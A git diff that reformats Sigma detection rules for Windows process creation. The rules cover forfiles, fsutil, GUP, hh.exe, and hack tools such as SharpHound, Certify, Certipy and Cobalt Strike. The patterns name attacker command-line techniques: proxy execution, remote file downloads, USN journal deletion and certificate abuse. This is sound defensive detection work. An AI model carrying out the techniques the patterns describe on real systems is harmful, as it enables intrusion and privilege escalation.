4931188c-178e-4ee7-a348-39e8a7a56821 # Generic + type: similar status: test description: Detects possible Sysmon filter driver unloaded via fltmc.exe references: @@ -24,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \fltMC.exe - - OriginalFileName: fltMC.exe + - Image|endswith: \fltMC.exe + - OriginalFileName: fltMC.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - unload - sysmon condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml b/sigma/sysmon/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml index 8d3f0ff75..f544363ed 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml @@ -1,10 +1,8 @@ title: Forfiles.EXE Child Process Masquerading id: f53714ec-5077-420e-ad20-907ff9bb2958 status: experimental -description: 'Detects the execution of "forfiles" from a non-default location, in - order to potentially spawn a custom "cmd.exe" from the current working directory. - - ' +description: | + Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory. references: - https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/ author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati @@ -21,11 +19,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: + # Notes: + # - The parent must not have CLI options + # - The Child Image must be named "cmd" as its hardcoded in the "forfiles" binary + # - The Child CLI will always contains "/c echo" as its hardcoded in the original "forfiles" binary ParentCommandLine|endswith: - .exe - .exe" Image|endswith: \cmd.exe - CommandLine|startswith: /c echo " + CommandLine|startswith: /c echo " filter_main_parent_not_sys: ParentImage|contains: - :\Windows\System32\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_forfiles_proxy_execution_.yml b/sigma/sysmon/process_creation/proc_creation_win_forfiles_proxy_execution_.yml index 3cccda4b2..f86085e64 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_forfiles_proxy_execution_.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_forfiles_proxy_execution_.yml @@ -1,24 +1,19 @@ title: Forfiles Command Execution id: 9aa5106d-bce3-4b13-86df-3a20f1d5cf0b related: - - id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8 - type: obsoletes - - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 - type: obsoletes + - id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8 + type: obsoletes + - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 + type: obsoletes status: test -description: 'Detects the execution of "forfiles" with the "/c" flag. - - While this is an expected behavior of the tool, it can be abused in order to proxy - execution through it with any binary. - +description: | + Detects the execution of "forfiles" with the "/c" flag. + While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. Can be used to bypass application whitelisting. - - ' references: - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/ - https://pentestlab.blog/2020/07/06/indirect-command-execution/ -author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), - oscd.community +author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community date: 2022/06/14 modified: 2024/01/05 tags: @@ -33,10 +28,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \forfiles.exe - - OriginalFileName: forfiles.exe + - Image|endswith: \forfiles.exe + - OriginalFileName: forfiles.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /c ' - ' -c ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_fsutil_drive_enumeration.yml b/sigma/sysmon/process_creation/proc_creation_win_fsutil_drive_enumeration.yml index b3206b0c5..347f56036 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_fsutil_drive_enumeration.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_fsutil_drive_enumeration.yml @@ -20,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \fsutil.exe - - OriginalFileName: fsutil.exe + - Image|endswith: \fsutil.exe + - OriginalFileName: fsutil.exe selection_cli: - CommandLine|contains: drives + CommandLine|contains: drives condition: process_creation and (all of selection_*) falsepositives: - Certain software or administrative tasks may trigger false positives. diff --git a/sigma/sysmon/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml b/sigma/sysmon/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml index 979795269..f558d6641 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml @@ -1,13 +1,9 @@ title: Fsutil Behavior Set SymlinkEvaluation id: c0b2768a-dd06-4671-8339-b16ca8d1f27f status: test -description: 'A symbolic link is a type of file that contains a reference to another - file. - - This is probably done to make sure that the ransomware is able to follow shortcuts - on the machine in order to find the original file to encrypt - - ' +description: | + A symbolic link is a type of file that contains a reference to another file. + This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt references: - https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware - https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior @@ -26,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \fsutil.exe - - OriginalFileName: fsutil.exe + - Image|endswith: \fsutil.exe + - OriginalFileName: fsutil.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'behavior ' - 'set ' - SymlinkEvaluation diff --git a/sigma/sysmon/process_creation/proc_creation_win_fsutil_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_fsutil_usage.yml index f2ad7594c..3c1cd6b45 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_fsutil_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_fsutil_usage.yml @@ -1,12 +1,9 @@ title: Fsutil Suspicious Invocation id: add64136-62e5-48ea-807e-88638d02df1e status: stable -description: 'Detects suspicious parameters of fsutil (deleting USN journal, configuring - it with small size, etc). - +description: | + Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomwares during the attack (seen by NotPetya and others). - - ' references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md @@ -30,13 +27,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \fsutil.exe - - OriginalFileName: fsutil.exe + - Image|endswith: \fsutil.exe + - OriginalFileName: fsutil.exe selection_cli: - CommandLine|contains: - - deletejournal - - createjournal - - setZeroData + CommandLine|contains: + - deletejournal # usn deletejournal ==> generally ransomware or attacker + - createjournal # usn createjournal ==> can modify config to set it to a tiny size + - setZeroData # file setZeroData ==> empties a file with zeroes condition: process_creation and (all of selection_*) falsepositives: - Admin activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml b/sigma/sysmon/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml index eb9b7a4d4..f324c917c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml @@ -1,8 +1,7 @@ title: Arbitrary File Download Via GfxDownloadWrapper.EXE id: eee00933-a761-4cd0-be70-c42fe91731e7 status: test -description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument - to download file. +description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file. references: - https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/ author: Victor Sergeev, oscd.community @@ -21,11 +20,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \GfxDownloadWrapper.exe - CommandLine|contains: + CommandLine|contains: - http:// - https:// filter_main_known_urls: - CommandLine|contains: https://gameplayapi.intel.com/ + CommandLine|contains: https://gameplayapi.intel.com/ condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_git_susp_clone.yml b/sigma/sysmon/process_creation/proc_creation_win_git_susp_clone.yml index 298cc9f28..ab7087869 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_git_susp_clone.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_git_susp_clone.yml @@ -1,8 +1,7 @@ title: Suspicious Git Clone id: aef9d1f1-7396-4e92-a927-4567c7a495c1 status: test -description: Detects execution of "git" in order to clone a remote repository that - contain suspicious keywords which might be suspicious +description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious references: - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt author: Nasreddine Bencherchali (Nextron Systems) @@ -20,16 +19,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \git.exe - - \git-remote-https.exe - - OriginalFileName: git.exe + - Image|endswith: + - \git.exe + - \git-remote-https.exe + - OriginalFileName: git.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' clone ' - 'git-remote-https ' selection_keyword: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious keywords - exploit - Vulns - vulnerability @@ -38,6 +38,7 @@ detection: - CVE- - poc- - ProofOfConcept + # Add more vuln names - proxyshell - log4shell - eternalblue diff --git a/sigma/sysmon/process_creation/proc_creation_win_googleupdate_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_googleupdate_susp_child_process.yml index d3733d363..8d42ba15c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_googleupdate_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_googleupdate_susp_child_process.yml @@ -1,8 +1,8 @@ title: Potentially Suspicious GoogleUpdate Child Process id: 84b1ecf9-6eff-4004-bafb-bae5c0e251b2 related: - - id: bdbab15a-3826-48fa-a1b7-723cd8f32fcc - type: derived + - id: bdbab15a-3826-48fa-a1b7-723cd8f32fcc + type: derived status: experimental description: Detects potentially suspicious child processes of "GoogleUpdate.exe" references: @@ -23,13 +23,14 @@ detection: selection: ParentImage|endswith: \GoogleUpdate.exe filter_main_known_legit: - - Image|contains: \Google - - Image|endswith: - - \setup.exe - - chrome_updater.exe - - chrome_installer.exe + # Some other legit child process might exist. It's better to make a baseline before running this in production + - Image|contains: \Google # Example: GoogleUpdate.exe, GoogleCrashHandler.exe, GoogleUpdateComRegisterShell64.exe + - Image|endswith: + - \setup.exe + - chrome_updater.exe + - chrome_installer.exe filter_main_image_null: - Image: null + Image: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_gpg4win_decryption.yml b/sigma/sysmon/process_creation/proc_creation_win_gpg4win_decryption.yml index b71336e2f..1c8a24988 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gpg4win_decryption.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gpg4win_decryption.yml @@ -19,12 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_metadata: - - Image|endswith: - - \gpg.exe - - \gpg2.exe - - Description: "GnuPG\u2019s OpenPGP tool" + - Image|endswith: + - \gpg.exe + - \gpg2.exe + - Description: GnuPG’s OpenPGP tool selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -d ' - passphrase condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_gpg4win_encryption.yml b/sigma/sysmon/process_creation/proc_creation_win_gpg4win_encryption.yml index cd8759758..c46b54fe7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gpg4win_encryption.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gpg4win_encryption.yml @@ -19,12 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_metadata: - - Image|endswith: - - \gpg.exe - - \gpg2.exe - - Description: "GnuPG\u2019s OpenPGP tool" + - Image|endswith: + - \gpg.exe + - \gpg2.exe + - Description: GnuPG’s OpenPGP tool selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -c ' - passphrase condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_gpg4win_portable_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_gpg4win_portable_execution.yml index 82d1fca56..57d30e399 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gpg4win_portable_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gpg4win_portable_execution.yml @@ -1,8 +1,7 @@ title: Portable Gpg.EXE Execution id: 77df53a5-1d78-4f32-bc5a-0e7465bd8f41 status: experimental -description: Detects the execution of "gpg.exe" from uncommon location. Often used - by ransomware and loaders to decrypt/encrypt data. +description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data. references: - https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a - https://securelist.com/locked-out/68960/ @@ -22,11 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \gpg.exe - - \gpg2.exe - - OriginalFileName: gpg.exe - - Description: "GnuPG\u2019s OpenPGP tool" + - Image|endswith: + - \gpg.exe + - \gpg2.exe + - OriginalFileName: gpg.exe + - Description: GnuPG’s OpenPGP tool filter_main_legit_location: Image|contains: - :\Program Files (x86)\GNU\GnuPG\bin\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_gpg4win_susp_location.yml b/sigma/sysmon/process_creation/proc_creation_win_gpg4win_susp_location.yml index 0a30bf328..9f7c4a2fd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gpg4win_susp_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gpg4win_susp_location.yml @@ -1,8 +1,7 @@ title: File Encryption/Decryption Via Gpg4win From Suspicious Locations id: e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d status: experimental -description: Detects usage of Gpg4win to encrypt/decrypt files located in potentially - suspicious locations. +description: Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations. references: - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html - https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/ @@ -20,15 +19,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_metadata: - - Image|endswith: - - \gpg.exe - - \gpg2.exe - - Product: GNU Privacy Guard (GnuPG) - - Description: "GnuPG\u2019s OpenPGP tool" + - Image|endswith: + - \gpg.exe + - \gpg2.exe + - Product: GNU Privacy Guard (GnuPG) + - Description: GnuPG’s OpenPGP tool selection_cli: - CommandLine|contains: -passphrase + CommandLine|contains: -passphrase selection_paths: - CommandLine|contains: + CommandLine|contains: - :\PerfLogs\ - :\Temp\ - :\Users\Public\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_gpresult_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_gpresult_execution.yml index f5c5d813c..53106d921 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gpresult_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gpresult_execution.yml @@ -1,8 +1,7 @@ title: Gpresult Display Group Policy Information id: e56d3073-83ff-4021-90fe-c658e0709e72 status: test -description: Detects cases in which a user uses the built-in Windows utility gpresult - to display the Resultant Set of Policy (RSoP) information +description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult @@ -23,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \gpresult.exe - CommandLine|contains: + CommandLine|contains: - /z - /v condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml index 6757580a7..7d254de5f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml @@ -1,8 +1,7 @@ title: Arbitrary Binary Execution Using GUP Utility id: d65aee4d-2292-4cea-b832-83accd6cfa43 status: test -description: Detects execution of the Notepad++ updater (gup) to launch other commands - or executables +description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables references: - https://twitter.com/nas_bench/status/1535322445439180803 author: Nasreddine Bencherchali (Nextron Systems) @@ -23,11 +22,11 @@ detection: Image|endswith: \explorer.exe filter: Image|endswith: \explorer.exe - CommandLine|contains: \Notepad++\notepad++.exe + CommandLine|contains: \Notepad++\notepad++.exe filter_parent: ParentImage|contains: \Notepad++\updater\ filter_null: - CommandLine: null + CommandLine: condition: process_creation and (selection and not 1 of filter*) falsepositives: - Other parent binaries using GUP not currently identified diff --git a/sigma/sysmon/process_creation/proc_creation_win_gup_download.yml b/sigma/sysmon/process_creation/proc_creation_win_gup_download.yml index 53f99df3d..801cd9d71 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gup_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gup_download.yml @@ -1,8 +1,7 @@ title: File Download Using Notepad++ GUP Utility id: 44143844-0631-49ab-97a0-96387d6b2d7c status: test -description: Detects execution of the Notepad++ updater (gup) from a process other - than Notepad++ to download files. +description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files. references: - https://twitter.com/nas_bench/status/1535322182863179776 author: Nasreddine Bencherchali (Nextron Systems) @@ -20,17 +19,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \GUP.exe - - OriginalFileName: gup.exe + - Image|endswith: \GUP.exe + - OriginalFileName: gup.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -unzipTo ' - http filter: ParentImage|endswith: \notepad++.exe condition: process_creation and (all of selection* and not filter) falsepositives: - - Other parent processes other than notepad++ using GUP that are not currently - identified + - Other parent processes other than notepad++ using GUP that are not currently identified level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_gup_suspicious_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_gup_suspicious_execution.yml index 11d28732d..b74f67e4d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gup_suspicious_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gup_suspicious_execution.yml @@ -1,8 +1,7 @@ title: Suspicious GUP Usage id: 0a4f6091-223b-41f6-8743-f322ec84930b status: test -description: Detects execution of the Notepad++ updater in a suspicious directory, - which is often used in DLL side-loading attacks +description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks references: - https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_hh_chm_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_hh_chm_execution.yml index 99b221d38..de8958719 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hh_chm_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hh_chm_execution.yml @@ -21,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: HH.exe - - Image|endswith: \hh.exe + - OriginalFileName: HH.exe + - Image|endswith: \hh.exe selection_cli: - CommandLine|contains: .chm + CommandLine|contains: .chm condition: process_creation and (all of selection_*) falsepositives: - False positives are expected with legitimate ".CHM" diff --git a/sigma/sysmon/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml index 05e4bb1d3..96be7e010 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml @@ -1,8 +1,7 @@ title: Remote CHM File Download/Execution Via HH.EXE id: f57c58b3-ee69-4ef5-9041-455bf39aaa89 status: experimental -description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" - files. +description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files. references: - https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html - https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: HH.exe - - Image|endswith: \hh.exe + - OriginalFileName: HH.exe + - Image|endswith: \hh.exe selection_cli: - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hh_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_hh_susp_execution.yml index b8fed55c4..5fd8f5422 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hh_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hh_susp_execution.yml @@ -34,16 +34,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: HH.exe - - Image|endswith: \hh.exe + - OriginalFileName: HH.exe + - Image|endswith: \hh.exe selection_paths: - CommandLine|contains: + CommandLine|contains: - .application - \AppData\Local\Temp\ - \Content.Outlook\ - \Downloads\ - \Users\Public\ - \Windows\Temp\ + # - '\AppData\Local\Temp\Temp?_' + # - '\AppData\Local\Temp\Rar$' + # - '\AppData\Local\Temp\7z' + # - '\AppData\Local\Temp\wz' + # - '\AppData\Local\Temp\peazip-tmp' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_adcspwn.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_adcspwn.yml index bd1595bab..82375fe4e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_adcspwn.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_adcspwn.yml @@ -1,9 +1,7 @@ title: HackTool - ADCSPwn Execution id: cd8c163e-a19b-402e-bdd5-419ff5859f12 status: test -description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges - in an active directory network by coercing authenticate from machine accounts - and relaying to the certificate service +description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service references: - https://github.com/bats3c/ADCSPwn author: Florian Roth (Nextron Systems) @@ -21,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' --adcs ' - ' --port ' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml index dec0ce9e8..91d93ae19 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml @@ -1,8 +1,7 @@ title: HackTool - Bloodhound/Sharphound Execution id: f376c8a7-a2d0-4ddc-aa0c-16c17236d962 status: test -description: Detects command line parameters used by Bloodhound and Sharphound hack - tools +description: Detects command line parameters used by Bloodhound and Sharphound hack tools references: - https://github.com/BloodHoundAD/BloodHound - https://github.com/BloodHoundAD/SharpHound @@ -27,16 +26,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Product|contains: SharpHound - - Description|contains: SharpHound - - Company|contains: - - SpecterOps - - evil corp - - Image|contains: - - \Bloodhound.exe - - \SharpHound.exe + - Product|contains: SharpHound + - Description|contains: SharpHound + - Company|contains: + - SpecterOps + - evil corp + - Image|contains: + - \Bloodhound.exe + - \SharpHound.exe selection_cli_1: - CommandLine|contains: + CommandLine|contains: - ' -CollectionMethod All ' - ' --CollectionMethods Session ' - ' --Loop --Loopduration ' @@ -45,11 +44,11 @@ detection: - Invoke-Bloodhound - Get-BloodHoundData selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - ' -JsonFolder ' - ' -ZipFileName ' selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - ' DCOnly ' - ' --NoSaveCache ' condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml index 687f3656f..6f3fc5625 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml @@ -19,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - .dll - StartNodeRelay diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_certify.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_certify.yml index 7ef622e64..a678fa8bb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_certify.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_certify.yml @@ -1,8 +1,7 @@ title: HackTool - Certify Execution id: 762f2482-ff21-4970-8939-0aa317a886bb status: experimental -description: Detects Certify a tool for Active Directory certificate abuse based on - PE metadata characteristics and common command line arguments. +description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments. references: - https://github.com/GhostPack/Certify author: pH-T (Nextron Systems) @@ -21,18 +20,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \Certify.exe - - OriginalFileName: Certify.exe - - Description|contains: Certify + - Image|endswith: \Certify.exe + - OriginalFileName: Certify.exe + - Description|contains: Certify selection_cli_commands: - CommandLine|contains: + CommandLine|contains: - '.exe cas ' - '.exe find ' - '.exe pkiobjects ' - '.exe request ' - '.exe download ' selection_cli_options: - CommandLine|contains: + CommandLine|contains: - ' /vulnerable' - ' /template:' - ' /altname:' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_certipy.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_certipy.yml index e7bd2e6e0..ff5860544 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_certipy.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_certipy.yml @@ -1,8 +1,7 @@ title: HackTool - Certipy Execution id: 6938366d-8954-4ddc-baff-c830b3ba8fcd status: experimental -description: Detects Certipy a tool for Active Directory Certificate Services enumeration - and abuse based on PE metadata characteristics and common command line arguments. +description: Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments. references: - https://github.com/ly4k/Certipy author: pH-T (Nextron Systems) @@ -20,11 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \Certipy.exe - - OriginalFileName: Certipy.exe - - Description|contains: Certipy + - Image|endswith: \Certipy.exe + - OriginalFileName: Certipy.exe + - Description|contains: Certipy selection_cli_commands: - CommandLine|contains: + CommandLine|contains: - ' auth ' - ' find ' - ' forge ' @@ -32,7 +31,7 @@ detection: - ' req ' - ' shadow ' selection_cli_flags: - CommandLine|contains: + CommandLine|contains: - ' -bloodhound' - ' -ca-pfx ' - ' -dc-ip ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml index e7d0693fc..e76a78eb3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml @@ -1,11 +1,10 @@ title: Operator Bloopers Cobalt Strike Commands id: 647c7b9e-d784-4fda-b9a0-45c565a7b729 related: - - id: 4f154fb6-27d1-4813-a759-78b93e0b9c48 - type: similar + - id: 4f154fb6-27d1-4813-a759-78b93e0b9c48 + type: similar status: test -description: Detects use of Cobalt Strike commands accidentally entered in the CMD - shell +description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell references: - https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf - https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/ @@ -26,14 +25,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: Cmd.Exe - - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe selection_cli: - CommandLine|startswith: + CommandLine|startswith: - 'cmd ' - cmd.exe - c:\windows\system32\cmd.exe - CommandLine|contains: + CommandLine|contains: - psinject - spawnas - make_token diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml index f430ad339..955d7c86e 100644 --- 